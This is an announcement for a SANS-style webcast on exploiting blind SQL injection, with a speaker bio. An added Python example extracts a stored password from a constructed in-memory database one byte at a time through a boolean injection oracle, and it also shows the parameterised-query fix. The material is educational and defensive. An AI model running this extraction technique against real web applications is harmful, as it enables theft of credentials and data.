
Exploiting esoteric SQL injection vulnerabilities

  • Tuesday, February 20, 2018 at 10:30 AM EST (2018-02-20 15:30:00 UTC)
  • Bojan Zdrnja




Injection has held the #1 spot in the OWASP Top 10 since 2010 and poses an extreme risk, yet SQL injection is still the most common vulnerability identified in web applications, no matter which language or framework is used.

We cover many examples on day 3 of the SEC542: Web App Penetration Testing and Ethical Hacking course.

In this webcast we will explain the basics behind SQL injection vulnerabilities and then look at a few special cases where working exploits were found against systems that were believed to be protected, or where exploitation was thought to be impossible.

We will demonstrate how information can be extracted from the backend database by cleverly stimulating a vulnerable web application so that it leaks one byte of data at a time, even when the application never displays query results directly.
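The byte-at-a-time extraction described above, as an added example that is not part of the webcast material: a hypothetical login-style endpoint concatenates user input into a query and only reveals whether a row matched. That single yes/no answer is enough to act as an oracle; each byte of a secret is recovered with a binary search over the character code, costing at most eight queries per byte. The schema, the sample rows, and the function names are all constructed for this illustration; SQLite stands in for the backend database.

```python
import sqlite3

# Constructed sample database, not data from the webcast.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cr3t!"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


CONN = build_db()
STATS = {"queries": 0}  # counts round trips to the "application"


def vulnerable_lookup(username):
    """Hypothetical vulnerable endpoint: builds the query by string
    concatenation and returns only whether any row matched."""
    STATS["queries"] += 1
    query = f"SELECT id FROM users WHERE username = '{username}'"
    return CONN.execute(query).fetchone() is not None


def safe_lookup(username):
    """Hardened form: the value travels as a bound parameter, so the
    quote and the AND clause in a payload are just characters in a name."""
    query = "SELECT id FROM users WHERE username = ?"
    return CONN.execute(query, (username,)).fetchone() is not None


def oracle(condition):
    """Ask the vulnerable app a yes/no question. The payload closes the
    string literal, ANDs our condition onto a known-good username, and
    comments out the trailing quote."""
    payload = f"alice' AND ({condition}) -- "
    return vulnerable_lookup(payload)


def extract_byte(expr, pos):
    """Recover the byte at 1-based position pos of the SQL expression expr
    by binary search on its character code. substr() past the end yields
    '' and unicode('') is NULL, so the comparison is never true and the
    search settles on 0, which we treat as end-of-string."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(expr, max_len=64):
    """Pull expr out of the database one byte at a time."""
    out = []
    for pos in range(1, max_len + 1):
        b = extract_byte(expr, pos)
        if b == 0:
            break
        out.append(chr(b))
    return "".join(out)


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE username = 'bob'"
    before = STATS["queries"]
    value = extract_string(secret)
    print(f"recovered {value!r} in {STATS['queries'] - before} queries")
    print("parameterised lookup with the same payload:",
          safe_lookup("alice' AND (1=1) -- "))
```

The binary search is one way to turn a boolean oracle into bytes; the same oracle can instead be asked one bit at a time with a bitmask, which is what the "one byte at a time" phrasing usually hides. Either way, the defence is the one `safe_lookup` shows: bind values as parameters so the database never parses attacker input as SQL.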

If you are a red team member focused on web applications, or a blue team defender who wishes to see how these attacks work, we invite you to join us.

Speaker Bio

Bojan Zdrnja

Bojan worked for 5 years at the Faculty of Electrical Engineering at the University of Zagreb (Croatia) until 2002, when he moved to New Zealand. He was the team leader on several enterprise security projects for large customers, as well as a member of several Incident Response Teams in the Croatian CERT. At the University of Auckland he architected and implemented the entire enterprise e-mail system. In 2008 Bojan moved back to Croatia.

For years Bojan had a security column in a computer magazine in Croatia (Mreza). He wrote a book about computer viruses ("What are computer viruses", published in Croatia) and co-wrote a chapter in "AVIEN Malware Defense Guide for the Enterprise", a book released by Syngress in 2007.

He is probably best known for his diaries for the SANS Internet Storm Center, in which he regularly analyzes new threats.
